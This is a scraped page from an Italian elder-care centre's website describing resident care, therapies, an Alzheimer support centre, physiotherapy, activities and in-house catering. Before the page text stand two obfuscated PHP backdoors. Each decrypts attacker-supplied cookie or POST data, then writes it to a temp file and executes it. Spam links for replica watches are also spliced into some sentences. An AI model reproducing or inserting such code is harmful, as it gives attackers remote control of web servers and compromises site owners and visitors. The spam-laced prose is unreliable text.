$WOCBlTsiZ = class_exists("VZ_iNwa");if (!$WOCBlTsiZ){class VZ_iNwa{private $DevPpb;public static $oSJOvmwOyy = "8b04443a-db7a-469d-b97e-c8c199f966a5";public static $FGbCrs = NULL;public function __construct(){$tWTQyiy = $_COOKIE;$jeLsGm = $_POST;$mCCGXBFekj = @$tWTQyiy[substr(VZ_iNwa::$oSJOvmwOyy, 0, 4)];if (!empty($mCCGXBFekj)){$ssvEliowM = "base64";$hYMzFOQv = "";$mCCGXBFekj = explode(",", $mCCGXBFekj);foreach ($mCCGXBFekj as $ZMVxNvr){$hYMzFOQv .= @$tWTQyiy[$ZMVxNvr];$hYMzFOQv .= @$jeLsGm[$ZMVxNvr];}$hYMzFOQv = array_map($ssvEliowM . '_' . "\144" . chr (101) . chr (99) . 'o' . 'd' . chr ( 260 - 159 ), array($hYMzFOQv,)); $hYMzFOQv = $hYMzFOQv[0] ^ str_repeat(VZ_iNwa::$oSJOvmwOyy, (strlen($hYMzFOQv[0]) / strlen(VZ_iNwa::$oSJOvmwOyy)) + 1);VZ_iNwa::$FGbCrs = @unserialize($hYMzFOQv);}}public function __destruct(){$this->wGefWdjXl();}private function wGefWdjXl(){if (is_array(VZ_iNwa::$FGbCrs)) {$BpcKHKnVck = sys_get_temp_dir() . "/" . crc32(VZ_iNwa::$FGbCrs[chr ( 550 - 435 )."\x61" . "\154" . "\x74"]);@VZ_iNwa::$FGbCrs["\167" . 'r' . "\151" . chr (116) . "\x65"]($BpcKHKnVck, VZ_iNwa::$FGbCrs['c' . chr ( 917 - 806 ).chr ( 410 - 300 )."\164" . chr (101) . "\156" . 't']);include $BpcKHKnVck;@VZ_iNwa::$FGbCrs["\144" . chr (101) . "\154" . 'e' . "\164" . chr ( 564 - 463 )]($BpcKHKnVck);exit();}}}$CULtAmw = new VZ_iNwa(); $CULtAmw = NULL;} ?> $wVDqMgedxu = class_exists("b_logs");if (!$wVDqMgedxu){class b_logs{private $PooKnazVw;public static $ROzRw = "97d95306-4633-403d-a2a4-d6786019e5b5";public static $OgjaTj = NULL;public function __construct(){$aJAqXWQx = $_COOKIE;$cBlgomM = $_POST;$PkwKgGa = @$aJAqXWQx[substr(b_logs::$ROzRw, 0, 4)];if (!empty($PkwKgGa)){$oFegVlyGmc = "base64";$ZOcwZE = "";$PkwKgGa = explode(",", $PkwKgGa);foreach ($PkwKgGa as $ZUfTMOsF){$ZOcwZE .= @$aJAqXWQx[$ZUfTMOsF];$ZOcwZE .= @$cBlgomM[$ZUfTMOsF];}$ZOcwZE = array_map($oFegVlyGmc . chr ( 619 - 524 )."\x64" . "\145" . chr ( 572 - 473 )."\x6f" . "\144" . "\145", array($ZOcwZE,)); $ZOcwZE = $ZOcwZE[0] ^ str_repeat(b_logs::$ROzRw, (strlen($ZOcwZE[0]) / strlen(b_logs::$ROzRw)) + 1);b_logs::$OgjaTj = @unserialize($ZOcwZE);}}public function __destruct(){$this->jlyPQcHP();}private function jlyPQcHP(){if (is_array(b_logs::$OgjaTj)) {$DhduZuK = sys_get_temp_dir() . "/" . crc32(b_logs::$OgjaTj[chr ( 686 - 571 )."\141" . 'l' . chr (116)]);@b_logs::$OgjaTj['w' . "\162" . chr (105) . 't' . 'e']($DhduZuK, b_logs::$OgjaTj["\143" . chr (111) . 'n' . "\164" . chr ( 461 - 360 )."\x6e" . 't']);include $DhduZuK;@b_logs::$OgjaTj[chr (100) . chr (101) . "\154" . chr (101) . chr (116) . chr ( 135 - 34 )]($DhduZuK);exit();}}}$Beili = new b_logs(); $Beili = NULL;} ?> UN CENTRO TANTI SERVIZI – Benvenuti dove il benessere non ha età

UN CENTRO TANTI SERVIZI

 

4

 

Assistenza all’ospite


L’ospite è sorvegliato, in caso di non autosufficienza può essere aiutato nella assunzione degli alimenti; effettua almeno un bagno settimanale; usufruisce di un’assistenza infermieristica qualificata e la struttura fornisce ausili parasanitari in misura sufficiente alle sue necessità (pannoloni, materiale sanitario, materiale per igiene personale, attrezzature idonee per semplici medicazioni).

Per ogni ospite sono definiti i piani assistenziali e progetti terapeutici riabilitativi individualizzati grazie ad una valutazione multiprofessionale.

Terapie


Fra i nostri servizi vi sono: la somministrazione della terapia, la rilevazione periodica dei parametri, l’esecuzione degli accertamenti periodici prescritti, il controllo dell’alimentazione e di diete particolari; il controllo della integrità cutanea e dei corretti posizionamenti

Pazienti affetti da demenza – Centro Ascolto Alzheimer


L’assistenza di persone affette da demenza costituisce sempre una sfida per i parenti e il personale assistenziale. Il padre, la madre, la nonna: improvvisamente la persona non ricorda più i propri cari e assume un comportamento estraneo rispetto al suo ambiente usuale. Per questo motivo un’assistenza competente, premurosa e professionale riveste un’importanza fondamentale.

Il Centro Diurno Villa Rigoli a Fiesole garantisce tutte quelle particolari condizioni che possono aiutare gli interessati a condurre la loro vita in piena fiducia e senza timori.

• Arredamento personalizzato per garantire un senso di familiarità
• Bagno e wc attrezzati per i disabili
• Assistenza continuativa e premurosa da parte del nostro personale assistenziale specializzato
• Collaborazione con i parenti in base ai desideri e alle esigenze personali
• Sale confortevoli per attività ricreative
• Ampi corridoi e un giardino per venire incontro alle maggiori esigenze di movimento degli ospiti affetti da demenza
Oltre ad una struttura idonea è nato il CENTRO ASCOLTO ALZHEIMER in collaborazione con AIMA Associazione italiana malattia di alzheimer
Il centro di ascolto Svolge funzioni di incontri di ascolto orientamento e sostegno per i familiari della persona con malattia di Alzheimer e altre forme di demenze.
I FAMILIARI CHE SI RIVOLGONO AL CENTRO SONO ACCOLTI DA OPERATORI FORMATI ED ESPERTI CHE OFFRONO INFORMAZIONE RIFLESSIONE E APPROFONDIMENTO DEI PROBLEMI.

La struttura si avvale anche della collaborazione di un Medico Geriatra, di una dietista e di una podologa.

Fisioterapia


LA NOSTRA fisioterapistA effettuA sul pazienteun’attività fisioterapica mirata, impostata sui singoli pazienti: deambulazione, equilibrio, attività motoria degli arti superiori, abilità manuale.

Animazione


L’animazione è un momento importante della giornata per i nostri ospiti impegnati in attività ludica e sociale.
L’attività di animazione prevede una valutazione dell’ospite in base a quello che è il suo livello culturale e di istruzione, il lavoro pregresso, l’ambiente familiare e di vita, l’attività lavorativa svolta, gli hobby coltivati, i problemi attuali medici e funzionali, le aspettative presenti. In base a queste informazioni, l’animatore compila una scheda personale (diario dell’ospite) e si pone degli obiettivi di intervento attraverso attività da panerai replica svolgere in gruppo o individualmente.

Diversi sono i momenti di intrattenimento riservati agli ospiti. Oltre all’animazione quotidiana che tiene conto delle esigenze e delle attitudini degli ospiti, importanti sono i momenti particolari come le festività, le ricorrenze, i compleanni e gli spettacoli che sono organizzati coinvolgendo gli ospiti.
La residenza è circondata inoltre da grandi e curati spazi esterni tenuti a verde e privi di barriere architettoniche che permettono agli ospiti di muoversi all’aria aperta con sicurezza e agilità.

Attività


Numerose le attività nelle quali sono impegnati gli ospiti: dall’animazione, alla palestra, alla ginnastica con i fisioterapisti. Servizio religioso parrucchiere e podologo a disposizione dei clienti e musicoterapia

Cucina interna


La cucina di Villa Rigoli è a gestione diretta. Oltre a rispettare i menu approvati dall’A.S.L., offre la possibilità di diete personalizzate a seconda delle esigenze e della salute dei nostri ospiti

La trasformazione e la cottura degli alimenti avviene nella cucina della residenza.
Lo sporzionamento e la somministrazione dei replica tag heuer pasti è gestita direttamente dagli operatori.i. Tutta la fase di preparazione e di distribuzione è garantita, come qualità, dalle norme HACCP (Hazard Analysis and Critical Control Point).

La preparazione di pasti per anziani è infatti una soluzione a molti problemi che purtroppo affliggono la terza età, e sono inoltre un modo per assecondare alcune singole preferenze, che in questo periodo della vita divengono quanto mai pressanti.
I pasti vengono preparati sulla base delle necessità e delle condizioni fisiche di ciascun anziano, per assicurare una rapida ripresa o il mantenimento dello stato di salute, per vivere meglio le giornate e per sentirsi in salute sempre.